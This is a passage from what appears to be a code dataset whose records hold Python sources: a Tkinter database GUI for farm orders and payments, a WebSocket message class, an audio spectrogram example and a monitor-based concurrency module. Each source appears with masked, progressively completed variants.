label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_or)\n\n Button.place(x=300, y=400)\n\ndef update_or():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM orders WHERE or_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Order Date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Order f_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Order to',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n #e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n #e2.insert(0,datetime.now())\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_ord)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Order_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_ord()\n\ndef update_command_ord():\n\n sql=\"UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n orders()\n\ndef search_ord():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_or)\n Button.place(x=400, y=400)\ndef search_or():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM orders WHERE or_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=orders)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['order Id: ','Order date: ','Order fid: ','Order formula: ','order to: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid order id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_ord()\n\n\n\n\n#payment page\ndef payment():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Payment Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_pay)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_pay)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_pay)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_pay)\n Button.place(x=410, y=50)\n\n view_pay()\n\n\ndef view_pay():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"trans_id\",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id',text=\"Transaction Id\")\n table.heading('p_f_id',text=\"Farmer Id\")\n\n\n table.heading('p_date',text=\"Payment Date\")\n table.heading('p_amount',text=\"Amount\")\n table.heading('p_method',text=\"Payment Method\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM payment;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_pay():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Transaction farmer id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n\n e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n #e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n #e2.insert(0,datetime.now())\n\n e3.place(x=350,y=110)\n e3.insert(0,datetime.now())\n e4.place(x=350,y=160)\n #e5.place(x=350,y=210)\n e5 = StringVar(root)\n e5.set(\"Debit card\") # default value\n\n w= OptionMenu(root, e5, \"Credit Card\", \"UPI\", \"Cheque\",\"Cash\")\n w.place(x=350,y=210)\n\n#mainloop()\n\n #e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=payment)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_pay_command)\n Button.place(x=400, y=400)\n\ndef insert_pay_command():\n try:\n sql=\"INSERT INTO payment values(%s,%s,%s,%s,%s);\"\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()\n cur.executemany(sql,[vals])\n db.commit()\n payment()\n except:\n insert_pay()\ndef delete_pay():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=payment)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_pay_command)\n Button.place(x=400, y=400)\n\n\ndef delete_pay_command():\n try:\n sql=\"DELETE FROM payment WHERE trans_id=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n payment()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_pay():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update_pa)\n\n Button.place(x=300, y=400)\n\ndef update_pa():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM payment WHERE trans_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n #e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n if count==5:\n continue\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n\n e3.place(x=350,y=110)\n #e3.insert(0,datetime.now())\n e4.place(x=350,y=160)\n #e5.place(x=350,y=210)\n #e6.place(x=350,y=270)\n e5 = StringVar(root)\n e5.set(\"Debit card\") # default value\n\n w= OptionMenu(root, e5, \"Credit Card\", \"UPI\", \"Cheque\",\"Cash\")\n w.place(x=350,y=210)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_pay)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Order_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_pay()\n\ndef update_command_pay():\n\n sql=\"UPDATE payment SET p_f_id=%s,p_date=%s,p_amount=%s,p_method=%s WHERE trans_id=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n payment()\ndef search_pay():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window2\n label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=payment)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_pa)\n Button.place(x=400, y=400)\ndef search_pa():\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM payment WHERE trans_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=payment)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['Transaction Id: ','Transaction fid: ','Transaction date: ','Transaction amount: ','Transaction method: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid order id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_pay()\n\n\nFirst_page(root)\nroot.mainloop()\n",
"step-ids": [
46,
47,
52,
53,
66
]
}
|
[
46,
47,
52,
53,
66
] |
class WSCommand:
handshake_hi = 'handshake_hi'
ping = 'ping'
pong = 'pong'
http_call = 'http_call'
http_return = 'http_return'
class WSMessage:
def __init__(self, command: str, data: any=None) ->None:
self.command = command
self.data = data
def strData(self) ->str:
return self.data
def dictData(self) ->dict:
return self.data
|
normal
|
{
"blob_id": "d4621ef378b89490278c09e569f781aef1fcef3f",
"index": 7013,
"step-1": "<mask token>\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n <mask token>\n\n def dictData(self) ->dict:\n return self.data\n",
"step-2": "<mask token>\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n\n def strData(self) ->str:\n return self.data\n\n def dictData(self) ->dict:\n return self.data\n",
"step-3": "class WSCommand:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n\n def strData(self) ->str:\n return self.data\n\n def dictData(self) ->dict:\n return self.data\n",
"step-4": "class WSCommand:\n handshake_hi = 'handshake_hi'\n ping = 'ping'\n pong = 'pong'\n http_call = 'http_call'\n http_return = 'http_return'\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n\n def strData(self) ->str:\n return self.data\n\n def dictData(self) ->dict:\n return self.data\n",
"step-5": null,
"step-ids": [
3,
4,
5,
6
]
}
|
[
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
if __name__ == '__main__':
[Fs, s] = wavfile.read('../data/sample_music.wav')
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=
'temp.html', auto_open=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
layout = go.Layout(title=
'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(
title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
if __name__ == '__main__':
[Fs, s] = wavfile.read('../data/sample_music.wav')
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=
'temp.html', auto_open=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
import scipy.io.wavfile as wavfile
import plotly
import plotly.graph_objs as go
from pyAudioAnalysis import ShortTermFeatures as aF
layout = go.Layout(title=
'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(
title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
if __name__ == '__main__':
[Fs, s] = wavfile.read('../data/sample_music.wav')
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=
'temp.html', auto_open=True)
<|reserved_special_token_1|>
"""!
@brief Example 04
@details pyAudioAnalysis spectrogram calculation and visualization example
@author Theodoros Giannakopoulos {tyiannak@gmail.com}
"""
import numpy as np
import scipy.io.wavfile as wavfile
import plotly
import plotly.graph_objs as go
from pyAudioAnalysis import ShortTermFeatures as aF
layout = go.Layout(title='Spectrogram Extraction Example using pyAudioAnalysis',
xaxis=dict(title='time (sec)',),
yaxis=dict(title='Freqs (Hz)',))
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / (2.0 ** 15)
signal = (signal - signal.mean())
return signal / ((np.abs(signal)).max() + 0.0000000001)
if __name__ == '__main__':
[Fs, s] = wavfile.read("../data/sample_music.wav")
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.020), int(Fs * 0.020))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout),
filename="temp.html", auto_open=True)
|
flexible
|
{
"blob_id": "cb40141eddce9ce11fbd8475fc7c3d37438208a6",
"index": 6862,
"step-1": "<mask token>\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read('../data/sample_music.wav')\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=\n 'temp.html', auto_open=True)\n",
"step-3": "<mask token>\nlayout = go.Layout(title=\n 'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(\n title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read('../data/sample_music.wav')\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=\n 'temp.html', auto_open=True)\n",
"step-4": "<mask token>\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nimport plotly\nimport plotly.graph_objs as go\nfrom pyAudioAnalysis import ShortTermFeatures as aF\nlayout = go.Layout(title=\n 'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(\n title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read('../data/sample_music.wav')\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=\n 'temp.html', auto_open=True)\n",
"step-5": "\"\"\"! \n@brief Example 04\n@details pyAudioAnalysis spectrogram calculation and visualization example\n@author Theodoros Giannakopoulos {tyiannak@gmail.com}\n\"\"\"\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nimport plotly\nimport plotly.graph_objs as go\nfrom pyAudioAnalysis import ShortTermFeatures as aF\nlayout = go.Layout(title='Spectrogram Extraction Example using pyAudioAnalysis',\n xaxis=dict(title='time (sec)',),\n yaxis=dict(title='Freqs (Hz)',))\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / (2.0 ** 15)\n signal = (signal - signal.mean())\n return signal / ((np.abs(signal)).max() + 0.0000000001)\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read(\"../data/sample_music.wav\")\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.020), int(Fs * 0.020))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout),\n filename=\"temp.html\", auto_open=True)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import inspect
import threading
from monitor.mutex import Mutex, mutex_hooks
from monitor.condition import Condition, condition_hooks
from monitor.shared_variables import SharedList, SharedDict, shared_auto, \
variable_hooks
hooks = {}
for h in [mutex_hooks, condition_hooks, variable_hooks]:
hooks.update(h)
def method_decorator(method):
def wrapped(self, *args, **kwargs):
# print(self, *args, **kwargs)
self._mutex.acquire()
for var in self._variables:
var.apply_pending_changes()
value = method(self, *args, **kwargs)
for var in self._variables:
var.sync()
self._mutex.release()
return value
return wrapped
class MonitorMeta(type):
def __init__(cls, name, bases, attrs):
super(MonitorMeta, cls).__init__(name, bases, attrs)
for name, method in inspect.getmembers(cls, predicate=inspect.isfunction):
if name not in ['wait', 'signal', 'register', 'shared',
'condition', '__init__', '__new__']:
setattr(cls, name, method_decorator(method))
class ConditionWrapper:
def __init__(self, condition, monitor):
self.condition = condition
self.monitor = monitor
def wait(self):
for var in self.monitor._variables:
var.sync()
self.condition.wait()
for var in self.monitor._variables:
var.apply_pending_changes()
def signal(self):
self.condition.signal()
class MonitorBase(object, metaclass=MonitorMeta):
_monitor_counter = 0
_variable_counter = 0
_condition_counter = 0
def __new__(cls, *args, **kwargs):
obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)
cls._monitor_counter += 1
mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)
obj._mutex = Mutex(mutex_name)
obj._variables = []
return obj
def wait(self, condition):
condition.wait()
def signal(self, condition):
condition.signal()
def register(self, variables):
self._variables.extend(variables)
def shared(self, data):
self.__class__._variable_counter += 1
name = 'variable-{}-{}'.format(self.__class__.__name__, self.__class__._variable_counter)
var = shared_auto(name, data)
self._variables.append(var)
return var
def condition(self):
self.__class__._condition_counter += 1
name = 'condition-{}-{}'.format(self.__class__.__name__, self.__class__._condition_counter)
c = ConditionWrapper(Condition(self._mutex, name), self)
return c
class Monitor(MonitorBase):
def __init__(self):
# self.s1 = SharedList('s1', [1,2,3])
# self.register([self.s1])
self.s1 = self.shared([1,2,3])
self.c = self.condition()
def test(self):
self.wait("aaa")
print("test")
self.signal("aaa")
return 1
def abc(self):
print("abc")
return 2
def seq(self):
for i in range(10):
print(rank, i)
def list_append(self, elem):
self.s1.append(elem)
def list_print(self):
print(self.s1)
if __name__ == '__main__':
import time
from monitor.main import event_loop, send_exit
m = Monitor()
event_loop_thread = threading.Thread(target=event_loop, args=(hooks,))
event_loop_thread.start()
# print(m._mutex)
# while True:
# m.seq()
m.list_append(5)
time.sleep(1)
m.list_print()
send_exit()
event_loop_thread.join()
|
normal
|
{
"blob_id": "80d49b24a2233569a340cee918393b1663c3d55d",
"index": 4598,
"step-1": "<mask token>\n\n\nclass ConditionWrapper:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ConditionWrapper:\n\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n <mask token>\n <mask token>\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ConditionWrapper:\n\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n <mask token>\n\n def signal(self):\n self.condition.signal()\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\n<mask token>\n",
"step-4": "<mask token>\nfor h in [mutex_hooks, condition_hooks, variable_hooks]:\n hooks.update(h)\n\n\ndef method_decorator(method):\n\n def wrapped(self, *args, **kwargs):\n self._mutex.acquire()\n for var in self._variables:\n var.apply_pending_changes()\n value = method(self, *args, **kwargs)\n for var in self._variables:\n var.sync()\n self._mutex.release()\n return value\n return wrapped\n\n\nclass MonitorMeta(type):\n\n def __init__(cls, name, bases, attrs):\n super(MonitorMeta, cls).__init__(name, bases, attrs)\n for name, method in inspect.getmembers(cls, predicate=inspect.\n isfunction):\n if name not in ['wait', 'signal', 'register', 'shared',\n 'condition', '__init__', '__new__']:\n setattr(cls, name, method_decorator(method))\n\n\nclass ConditionWrapper:\n\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n\n def wait(self):\n for var in self.monitor._variables:\n var.sync()\n self.condition.wait()\n for var in self.monitor._variables:\n var.apply_pending_changes()\n\n def signal(self):\n self.condition.signal()\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\nif __name__ == '__main__':\n import time\n from monitor.main import 